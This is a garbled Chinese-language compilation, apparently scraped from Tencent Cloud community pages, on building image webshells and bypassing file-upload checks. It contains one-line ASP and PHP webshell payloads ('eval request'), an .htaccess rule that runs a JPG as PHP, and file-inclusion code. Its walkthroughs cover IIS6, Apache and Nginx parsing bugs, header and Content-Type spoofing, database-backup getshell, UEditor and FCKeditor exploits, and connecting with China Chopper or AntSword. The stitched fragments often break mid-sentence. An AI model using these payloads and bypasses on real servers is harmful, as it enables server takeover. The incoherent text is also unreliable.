> 完整文件结构检测:通过调用图像函数进行检测文件是否为图像,需要文件内容保持相对完整,所以无法通过添加头部进行绕过 # 将普通图片1.jpg 和 木马文件shell.php ,合并成木马图片2.jpg 基本木马 简单变形 图片马 搜索某目录下文件是否含有木马 解析漏洞 木马文件就算被成功上传,如果没有被Web容器以脚本文件解析执行,也不会对服务器造成威胁。 然后上传shell.jpg图片马,此时该木马将被解析为php <FilesMatch "shell.jpg"> SetHandler application/x-httpd-php </FilesMatch ,创建1.asp文件夹,然后再到该文件夹下上传一个图片的webshell文件,获取其shell。 :伪造文件头,在一句话木马前面加入GIF89a,然后将木马保存为图片格式,如.jpg/.png/.gif 检验文件类型:修改 文件包含过WAF:在不含恶意代码的脚本文件中,通过文件包含引入含有恶意代码但后缀为图片格式的文件
为了绕过检测末尾的图片马,可以使用 图片 + 木马 + 图片 还可以图片+木马+zip 14.getimagesize 利用getimagesize()函数判断图片大小、格式、高度、宽度等、其实和图片马没有什么太大区别 IIS6.0解析漏洞: IIS是中间件 asp一句话木马: <%eval request(“alva”)%> iis6.0中 默认配置 .asa .cer .cdx 都会当做asp进行处理 上传一个图片马 这个靶场这里会对图片的内容进行检测,而并不是单单检测文件后缀名,这时候就可以用图片马来绕过,将真实的图片与一句话木马合并在一起,这样既可以用图片方式打开也可以用php方式打开。 有时候有些检测会检测末尾,这种情况可以使用 图片+木马+图片,将木马放在中间。 而iis6.0中默认配置`.asa .cer .cdx`会当做asp进行处理 将一句话木马文件和图片进行合并。 图片显示正常且十六进制中存在一句话木马。
代金券、腾讯视频VIP、QQ音乐VIP、QB、公仔等奖励等你来拿!
此版本存在目录解析漏洞:即*.asa/*.asp文件夹内的文件会被当作asp文件来解析 再次上传1.txt并使用Burp拦截,将文件夹路径修改abc.asp,点击发包 返回上传成功和路径,使用菜刀/蚁剑访问链接 尝试直接上传一句话木马1.php,发现无法上传; 将一句话木马的文件后缀名修改为.php5再次上传,此时上传成功; 使用菜刀连接,在/var/www/html/目录下找到key.php,打开得到key 尝试直接上传一句话木马1.php,提示不允许上传 上传图片马2.jpg,成功上传,但是无法连接 再次上传图片马2.jpg,使用Burp抓包并将文件后缀修改为php,使用菜刀成功连接得到key WebShell ,提示文件类型不正确,而图片文件可以上传 题目提示此题目标为了解Content-Type和MIME,于是尝试使用Burp抓包,上传PHP文件并修改Content-Type为image/jpeg,上传成功 在后台登录页面使用弱口令admin/admin登录 将asp一句话木马后缀修改为.jpg,然后点击左侧添加文章,在图片上传处将该木马图片上传。
");%> 这里没有放jsp的一句话木马,因为jsp的一句话比较复杂,想看的可以看这篇文章 一句话木马的使用 以php一句话为例,我们可以直接将这些语句插入到网站的某个php文件上,或者直接创建一个新的文件 ,在文件里写入一句话木马,然后把文件上传到网站上即可。 编辑相关参数,包括一句话木马所在的URL以及密码,最后点击“编辑” ? 在URL中选中目标网站,点击鼠标右键,选择“文件管理”,就能看到网站的目录结构了 ? 图片一句话制作 如果网站限制了上传类型,.asp,.php上传不上出,但是可以上传图片,那么就可以使用图片隐写术将一句话木马安插在图片里,具体操作步骤是: 首先准备好一张图片,一个一句话木马,以及同路径下的 此时产生的2.jpg就是我们要的图片一句话木马 总结 其他类型的一句话木马也是一样的使用方法。当然,一般网站不可能这么容易就上传,肯定有防护机制,比方说安全狗防护,这时可以去网上搜过狗一句话等等。
上传一句话木马test2.php,返回错误信息,文件类型错误。如下图: ? 1. 修改test2.php,加入gif89a文件头使其被认为是gif文件,仍然返回文件类型错误,如下图: ? ? 1. 仍然返回文件类型错误,判断该系统上传模块对文件内容进行检测 ? 1. 我们使用copy命令,把一句话木马和一个图片文件进行拼接,得到test.png文件,如下: ? 1. 如下图所示: ? ? 1. 利用后台管理中的扫描木马功能(“系统设置”-“系统工具”-“木马扫描”-“扫描木马”),找到该页面地址。如下图所示: ? ? 1. 将木马命名为任意含有ns字符串的文件,并上传,如下图所示: ? 1. 访问nsfile查看是否正常解析,如下图: ? 上传攻击结束 17、fck 2.2特殊文件名绕过 1. 还是好多,又不能导入文档,就发到这里吧,图片和文件都是一张一张复制进来的,很费事,所以。。。。。。这不是最终版,,,,还有部分明天发吧
.文件解析 sp.asp;.jpg 第一种,在网站下建立文件夹的名字为 .asp、.asa 的文件夹,其目录内的任何扩展名的文件都被IIS当作asp文件来解析并执行。 例如创建目录 sp.asp,那么 /sp.asp/1.jpg 将被当作asp文件来执行。假设黑客可以控制上传文件夹路径,就可以不管你上传后你的图片改不改名都能拿shell了。 2.将23.asa;jpg文件改名为23.jpg,并放到1.asp目录下访问,然后使用蚁剑连接 ? Nginx 漏洞 上传一个图片马,里面含有代码 <? > 该木马会在上传后,运用Apache的解析漏洞再次访问时生成一个shell.php木马 ? 访问该图片,并在末尾加上/.php ? 生成shell.php ? Apache解析漏洞 上传带一句话木马的1.php.q.w.d文件 ? 蚁剑连接 ?
,可能存在webshell网页木马,您可以登录虚拟主机控制台-对应主机的"管理"文件管理-网站木马查杀功能确认是否为恶意文件,相关帮助文档请参考网站木马查杀帮助。 其实网站webshel网页木马l就是一个asp脚本或php脚本木马后门,黑客在入侵了一个网站后,常常会在将这些 asp或php木马后门文件放置在网站服务器的web目录中,与正常的网页文件混在一起。 然后黑客就可以用web的方式,通过asp或php木马后门控制网站服务器,包括上传下载编辑以及篡改网站文件代码、查看数据库、执行任意程序命令拿到服务器权限等。阿里云的主机管理控制台中的提示图: ? 1)通过网站自身的程序漏洞如上传图片功能或留言功能,本身网站的程序用的就是开源的,而且还是经过网站开发公司在这个开源程序基础进行的二次开发,而且网站本身就留了后门,因为开源的程序作者不是傻瓜,肯定有利益可突的 2)黑客通过sql注入获取管理员的后台密码,登陆到后台系统,利用后台的管理工具向配置文件写入WebShell木马,或者黑客私自添加上传类型,允许脚本程序类似asp、php的格式的文件上传。
比如上传php.php.png 文件,里面包含一句话木马,我们只需要将第二个小黑点改为空格,也就是将16进制的2e 改为00 ? /x-httpd-php </FilesMatch> 然后再上传一个文件,不需要后缀名,文件名没要求,需要注意的是这个文件不仅要包含一句话木马,还要有.htaccess里面的"shuaige" ,之后通过菜刀连接就可以了 1.3 服务端文件内容检测绕过 如果对文件内容检测较为严格,可以在图片中插入一句话木马,如果手工插的话可能破坏图片结构,推荐使用工具插入,比如 edjpgcom ,只需要将托向它,它会弹出一个框框,在里面输入一句话木马就可以了 工具只支持 jpg格式的图片 链接:https://pan.baidu.com/s/1nDogyIOAXvAR_OxQraALpw 提取码:gtwn 拖入后,写入一句话木马,记事本打开图片查看,发现完美插入图片中 png 3) 解析文件类型 IIS6.0 默认的可执行文件有asp、asa、cer、cdx四种。
(DJ音乐站基本上都有这个问题,以及用某编辑器的同志) 1.常用方法:这种就是根据后缀判断是否是图片文件,需要注意的是这种格式:文件:1.asp;.jpg 1.asp%01.jpg 目录: 1.jpg 呃,也许吧,上面至少还有个文件后缀硬性判断,contentType这玩意抓个包,本地代理一开,直接就可以串改,传的是1.asp,你收的contextType依旧是图片格式,最后保存就玩完了) /// < (理论上需要二次渲染下图片,微软Save的时候有应该有一定的验证[我把含有一句话木马的图片上传,最后会返回一张空图片]) /// /// <returns></returns> public 生成了一句话图片木马 ? 第2个,用edjpgcom 打开一张图片就可以直接插入一句话木马了 ? 图片跟之前看起来没什么不同的 ? 用WinHex看看~ ? 上传测试 ? 成功上传了 ? 有人说把图片另存为其他格式就能消除一句话木马。。。。。呃,好吧,你可以这样理解~看图: ?
后台数据库备份Getshell 后台数据库备份getshell,上传图片马并获取图片马路径,通过数据库备份修改后缀名,如有后缀名无法修改或路径无法修改限制可修改前端代码绕过,当所备份的数据库来源无法修改时 如asp中单引号表示单行注释作用"%><%eval request("v01cano")%><%' 编辑器模版Getshell 通过网站的模版编写一句话,然后生成脚本文件getshell 通过将木马添加到压缩文件 >等一句话木马) 截取get请求 ? 将一句话木马 ? 浏览器访问查看是否成功 ? cmd=ipconfig #cmd=后面加命令 方式七 过杀毒软件方式 上传图片马c.jpg,图片马内容如下: <?php 导出Webshell select '<? 上传正常头像抓包将图片文件内容删除,burp右键选择文件黏贴功能,将zip包内容复制到burp中的图片内容,放行后菜刀连接图片上传路径下的文件夹(zip压缩包名)下的Webshell 注入漏洞Getshell
3.2 文件名限制 3.2.1二次上传绕过文件名‘ . ’ 修改为‘ _ ’ FCK在上传了诸如shell.asp;.jpg的文件后,会自动将文件名改为shell_asp;.jpg。 3.3 IIS6.0突破文件夹限制 Fckeditor/editor/filemanager/connectors/asp/connector.asp? ,创建诸如1.asp文件夹,然后再到该文件夹下上传一个图片的webshell文件,获取其shell。 /editor/fckeditor.html不可以上传文件,可以点击上传图片按钮再选择浏览服务器即可跳转至可上传文件页,可以查看已经上传的文件。 连接木马 在木马能够解析之后,使用各类工具连接到木马,获取webshell。至此,利用FCKeditor进行文件上传并攻击的过程就已经完成。 三.
废话不多说了,直接上正文 1、IIS解析漏洞 1、目录解析(IIS6.0):建立*.asa 、*.asp格式的文件夹时,其目录下的文件都被当做IIS当做 ASP文件来解析(*.asp/1.jpg目录解析 其中88.asp下的88.jpg文件会当成asp解析 1、文件解析(IIS6.0):当文件为*.asp;1.jpg文件名畸形解析 ,IIS6.0一样把文件当成asp解析 原理:分号后面的不解析。 6、绕过文件内容检测 例子: 打开站点,打开burpsuit,开启服务器代理,上传1.jpg照片,拦截数据包,在数据包中1.jpg修改为1.php,在图片数据的末尾空几个空格粘贴一句话木马的内容,上传, double rgb(88,88,88);font:9pt"> <inputname="PhotoUrlID" type="hidden" id="PhotoUrlID"value="6"> l 上传,第一个文件上传图片 ,第二个文件上传一句话木马,上传成功 l 用中国菜刀连接第二个文件一句话木马 l 通过源代码可以查看到上传的地址 11、IIS可PUT上传 主要是webDav没有做过滤,允许一些不安全的HTTP方法 ?
下载地址: https://github.com/rebeyond/Behinder ---- 2.图片一句话 (1) 题目分析 由于该题只能上传图片文件,我们想到的是图片一句话木马。 (4) 图片一句话木马制作 某些网站上传文件时,会检查你上传文件的头目录,如果你的一句话木马是放在PHP文件中,它很容易被识别出来。这个时候图片一句话木马的作用就体现出来了。 > //使用一句话木马时可以在函数前加”@”符 让php语句不显示错误信息从而增加隐蔽性 下面是我进一步制作的图片一句话木马。 这也是为什么有的图片一句话木马不能访问,其实和网站环境相关,也涉及到解析漏洞,需要让所上传的文件按php格式解析才能运行。 使用该方法我们尝试插入一句话木马,很幸运我们的图片是成功上传了。
编写,移动端以及电脑端都可以无缝对接,自适应页面,图片也可以自动适应当前的上传路径与页面比例大小,一些视频文件的上传,开源,高效,稳定,安全,一直深受站长们的喜欢。 ,绕过文件格式的限制,在获取远程资源的时候并没有对远程文件的格式进行严格的过滤与判断,攻击者可以上传任意文件包括脚本执行文件,包括aspx脚本木马,asp脚本木马,还可以利用该UEditor漏洞对服务器进行攻击 html文件,有利于我们提交数据过去: 然后我们打开html看到,需要一个远程链接的文件,这里我们可以找一个图片脚本木马,最好是一句话图片小马,把该小马文件上传到我们的网站服务器里,把文件名改为anquan.jpg aspx,然后复制网站链接到构造的html中去,如下图: 点击submit,直接上传成功,并返回我们的aspx脚本木马路径地址,我们打开就可以使用了。 2.在百度UEditor官方没有出补丁前,设置图片目录为只读,禁止写入。 3.修改程序的源代码,对crawlerhandler源文件进行文件上传格式的严格过滤与判断。
图片木马的小故事: PHP 5.4+ 之后“%00”截断方法已经无法有效的执行了!故此图片木马非常的有意思。 图片木马:(PHP为例) 1、Copy命令制作: ? 图片对比: ? 一句话木马图片连接: 我们成功上传木马后,并不能立马的使用菜刀连接上脚本。我们需要将图片木马jpg文件改为可执行的php脚本文件。 ? 如上图,成功的利用菜刀连接到了服务器。
php是过了的,Php就能过,或者PHP,一句话自己合成图片马用Xise连接即可。 直接抓包修改Content-Type 为正确的格式尝试绕过 文件内容检测绕过 抓包,在正常图片末尾添加一句话木马 多次上传Win特性绕过 多次上传同一个文件,windows会自动更新补全TEST (1) 文件内容检测绕过 针对文件内容检测的绕过,一般有两种方式, 1.制作图片马 2.文件幻术头绕过 垃圾数据填充绕过 修改HTTP请求,再之中加入大量垃圾数据。 IIS解析漏洞 IIS6.0在解析asp格式的时候有两个解析漏洞,一个是如果目录名包含".asp"字符串, 那么这个目录下所有的文件都会按照asp去解析,另一个是只要文件名中含有".asp;" 会优先按 > 文件包含绕过 上传图片木马 $x=$_GET['x']; include($x); 访问:http://www.xxxx.com/news.php?x=xxxxxx.jpg
第一种是上传一句话木马图片再数据库备份。 第二种是配置管理里面添加一句话。 我们先来说下第一种方法: 上传一句话木马图片再数据库备份 ? 我们先登录后台看下: ? 后台: ? 荣誉管理,添加公司荣誉,上传一句话木马图片: ? 上传: ? 接下来我们访问下该图片: ? 成功访问!接下来我们数据库备份成asp的脚本文件。 ? 配置文件插入一句话 配置文件一般在 inc/config.asp /admin/default.asp 在网站配置-版权管理添加一句话,添加完成后保存: ? 接下来我们连接配置文件: inc/config.asp ? 最后我们用菜刀连接: ? 也是可以正常连接的。
什么是木马 木马病毒是指隐藏在正常程序中的一段具有特殊功能的恶意代码,是具备破坏和删除文件、发送密码、记录键盘和攻击Dos等特殊功能的后门程序。 那,php的木马是长什么样的呢? ,讲到的是图片木马上传,那么该怎么制作图片木马呢? /a/1.php'),FILE_APPEND);//1.php是一个木马文件 直接通过txt形式打开,可看到新增的数据 ? 将1.jpg图片直接打开,可发现文件没有损坏: ? 运行图片文件 到现在,我们已经学会了如何给图片增加木马文件,并了解了图片木马的实现原理,那么,现在该如何在别人的网站执行这个木马呢?给图片改后缀?很明显我们办不到,那该怎么办呢? 各种木马写法,可以看 https://github.com/tioncico/webshell/tree/master/php 另外提一嘴,既然是可以执行php文件了,完全可以在图片文件中,include
WebShell的分类 Webshell根据脚本可以分为PHP脚本木马,ASP脚本木马,JSP脚本木马,也有基于.NET的脚本木马。 (将需要执行的指令数据放在本地磁盘文件中,利用IO函数来读取)•从数据库中读取(将需要执行的指令放在数据库中,利用数据库函数来读取)•从图片头部中获取: exif_read_data... (将需要执行的指令数据放在图片头部中,利用图片操作函数来读取) 代码执行 将用户传输的数据进行执行 •代码执行函数:eval、assert、system…执行(这是最普通、标准的代码执行)•LFI:include 但传统的Webshell都是基于文件类型的,黑客可以利用上传工具或网站漏洞植入木马,区别在于Webshell内存马是无文件马,利用中间件的进程执行某些恶意代码,不会有文件落地,给检测带来巨大难度。 ,虚拟终端,文件查看,图片查看,一键挂黑,作者居然还是个00后,tql!
环境(且网站为ASP网站),然后打开中转工具,记住一个网站的页面地址粘贴进工具里,值是多少就写多少,生成,把生成的文件放到目录里,接下来,打开网页,输入 http://127.0.0.1:(端口)/目录里文件 ,如果正常,那么输入 http://127.0.0.1:端口/值(目录文件)? ,一个ASP马,自行搭建一个上传地址,UPLOAD加载,UPFILE上传,COOKIS=( ) 7,〓数据库备份拿WEBSHELL和一句话木马入侵〓 通常进入后台了,发现有数据库备份,拿WEBSHELL 吧,找一个添加产品的地方,传一个大马,格式为JPG图片,然后把图片地址粘贴到数据库备份那里,给起个名字,如SHELL.ASP,然后合地址访问的时候就进入webshell了,一句话木马入侵,先编辑记事本, ,如果一个网站地址弹出对话框,显示上传成功,那么证明可以拿到WEBSHELL,传马,另外有的没有任何显示,直接空的,那么可以构建两个上传,第一个传JPG的图片,第二个传ASP马(大马),记住,大马后面要有个空格才行
腾讯主机安全(CWP)利用机器学习为用户提供黑客入侵检测和漏洞风险预警等安全防护服务,主要包括密码破解阻断、异常登录审计、木马文件查杀、高危漏洞检测等安全功能,解决当前服务器面临的主要网络安全风险,帮助企业构建服务器安全防护体系。
扫码关注云+社区
领取腾讯云代金券